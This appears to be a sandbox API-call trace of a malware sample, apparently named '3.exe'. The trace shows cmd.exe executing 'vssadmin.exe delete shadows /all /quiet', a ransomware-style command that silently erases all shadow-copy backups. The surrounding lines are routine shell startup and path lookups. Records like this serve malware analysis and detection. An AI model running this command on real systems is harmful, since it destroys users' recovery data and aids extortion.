	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x1, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x0, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x9, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x4, lpData=0x27e660*=0x9, lpcbData=0x27e644*=0x4) returned 0x0
	[0033.687] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27e640, lpData=0x27e660, lpcbData=0x27e644*=0x1000 | out: lpType=0x27e640*=0x0, lpData=0x27e660*=0x9, lpcbData=0x27e644*=0x1000) returned 0x2
	[0033.687] RegCloseKey (hKey=0x44) returned 0x0
	[0033.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.687] srand (_Seed=0x5dc417d1) 
	[0033.687] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet"
	[0033.688] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet"
	[0033.688] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.688] GetProcessHeap () returned 0x2f0000
	[0033.688] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30ca20
	[0033.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30ca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.688] GetProcessHeap () returned 0x2f0000
	[0033.688] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b4e0 | out: hHeap=0x2f0000) returned 1
	[0033.688] GetEnvironmentStringsW () returned 0x30aa50*
	[0033.688] GetProcessHeap () returned 0x2f0000
	[0033.689] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa94) returned 0x30cc40
	[0033.689] FreeEnvironmentStringsW (penv=0x30aa50) returned 1
	[0033.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.689] GetProcessHeap () returned 0x2f0000
	[0033.689] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x308300
	[0033.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x27f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x27f450, lpFilePart=0x27f430 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27f430*="Desktop") returned 0x25
	[0033.689] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.689] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x27f160 | out: lpFindFileData=0x27f160*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3099a0
	[0033.689] FindClose (in: hFindFile=0x3099a0 | out: hFindFile=0x3099a0) returned 1
	[0033.689] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x27f160 | out: lpFindFileData=0x27f160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3099a0
	[0033.690] FindClose (in: hFindFile=0x3099a0 | out: hFindFile=0x3099a0) returned 1
	[0033.690] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x27f160 | out: lpFindFileData=0x27f160*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3099a0
	[0033.690] FindClose (in: hFindFile=0x3099a0 | out: hFindFile=0x3099a0) returned 1
	[0033.690] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.690] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.690] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.690] GetProcessHeap () returned 0x2f0000
	[0033.690] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cc40 | out: hHeap=0x2f0000) returned 1
	[0033.690] GetEnvironmentStringsW () returned 0x30cc40*
	[0033.690] GetProcessHeap () returned 0x2f0000
	[0033.690] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30d730
	[0033.690] FreeEnvironmentStringsW (penv=0x30cc40) returned 1
	[0033.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.690] GetProcessHeap () returned 0x2f0000
	[0033.690] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308300 | out: hHeap=0x2f0000) returned 1
	[0033.690] GetProcessHeap () returned 0x2f0000
	[0033.690] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30e220
	[0033.691] GetProcessHeap () returned 0x2f0000
	[0033.691] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x64) returned 0x308300
	[0033.691] GetProcessHeap () returned 0x2f0000
	[0033.691] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30e220 | out: hHeap=0x2f0000) returned 1
	[0033.691] GetConsoleOutputCP () returned 0x1b5
	[0033.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.691] GetUserDefaultLCID () returned 0x409
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x27f560, cchData=128 | out: lpLCData="0") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x27f560, cchData=128 | out: lpLCData="0") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x27f560, cchData=128 | out: lpLCData="1") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.692] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.693] GetProcessHeap () returned 0x2f0000
	[0033.693] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x30b5b0
	[0033.693] GetConsoleTitleW (in: lpConsoleTitle=0x30b5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.693] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.693] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.693] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.694] GetProcessHeap () returned 0x2f0000
	[0033.694] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30e220
	[0033.694] GetProcessHeap () returned 0x2f0000
	[0033.694] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30e220 | out: hHeap=0x2f0000) returned 1
	[0033.694] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77
	[0033.694] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16
	[0033.694] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16
	[0033.695] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13
	[0033.695] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13
	[0033.695] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4
	[0033.695] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4
	[0033.695] GetProcessHeap () returned 0x2f0000
	[0033.695] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x30b7d0
	[0033.695] GetProcessHeap () returned 0x2f0000
	[0033.695] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x306570
	[0033.695] GetProcessHeap () returned 0x2f0000
	[0033.695] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x308570
	[0033.696] GetConsoleTitleW (in: lpConsoleTitle=0x27f470, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.697] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0033.697] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0033.698] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0033.699] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0033.700] GetProcessHeap () returned 0x2f0000
	[0033.700] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30b890
	[0033.700] GetProcessHeap () returned 0x2f0000
	[0033.700] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x62) returned 0x30bab0
	[0033.700] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0033.700] GetProcessHeap () returned 0x2f0000
	[0033.700] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x30bb20
	[0033.700] SetErrorMode (uMode=0x0) returned 0x0
	[0033.700] SetErrorMode (uMode=0x1) returned 0x0
	[0033.700] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x30bb30, lpFilePart=0x27ed00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27ed00*="Desktop") returned 0x25
	[0033.700] SetErrorMode (uMode=0x0) returned 0x1
	[0033.700] GetProcessHeap () returned 0x2f0000
	[0033.700] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30bb20, Size=0x76) returned 0x30bb20
	[0033.700] GetProcessHeap () returned 0x2f0000
	[0033.700] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30bb20) returned 0x76
	[0033.701] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.701] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.701] GetProcessHeap () returned 0x2f0000
	[0033.701] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x30bbb0
	[0033.701] GetProcessHeap () returned 0x2f0000
	[0033.701] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x30bce0
	[0033.706] GetProcessHeap () returned 0x2f0000
	[0033.706] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30bce0, Size=0x12a) returned 0x30bce0
	[0033.706] GetProcessHeap () returned 0x2f0000
	[0033.706] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30bce0) returned 0x12a
	[0033.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.706] GetProcessHeap () returned 0x2f0000
	[0033.706] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x30be20
	[0033.706] GetProcessHeap () returned 0x2f0000
	[0033.706] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30be20, Size=0x7e) returned 0x30be20
	[0033.706] GetProcessHeap () returned 0x2f0000
	[0033.706] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30be20) returned 0x7e
	[0033.707] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.707] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x27ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27ea70) returned 0xffffffffffffffff
	[0033.707] GetLastError () returned 0x2
	[0033.707] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x27ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27ea70) returned 0xffffffffffffffff
	[0033.708] GetLastError () returned 0x2
	[0033.708] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x27ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27ea70) returned 0xffffffffffffffff
	[0033.708] GetLastError () returned 0x2
	[0033.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.708] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x27ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27ea70) returned 0x3099a0
	[0034.120] GetProcessHeap () returned 0x2f0000
	[0034.120] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x3045f0
	[0034.120] FindClose (in: hFindFile=0x3099a0 | out: hFindFile=0x3099a0) returned 1
	[0034.121] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0034.121] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0034.121] GetConsoleTitleW (in: lpConsoleTitle=0x27efc0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0034.121] InitializeProcThreadAttributeList (in: lpAttributeList=0x27ed78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x27ed38 | out: lpAttributeList=0x27ed78, lpSize=0x27ed38) returned 1
	[0034.121] UpdateProcThreadAttribute (in: lpAttributeList=0x27ed78, dwFlags=0x0, Attribute=0x60001, lpValue=0x27ed28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x27ed78, lpPreviousValue=0x0) returned 1
	[0034.121] GetStartupInfoW (in: lpStartupInfo=0x27ee90 | out: lpStartupInfo=0x27ee90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0034.121] GetProcessHeap () returned 0x2f0000
	[0034.121] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304620
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
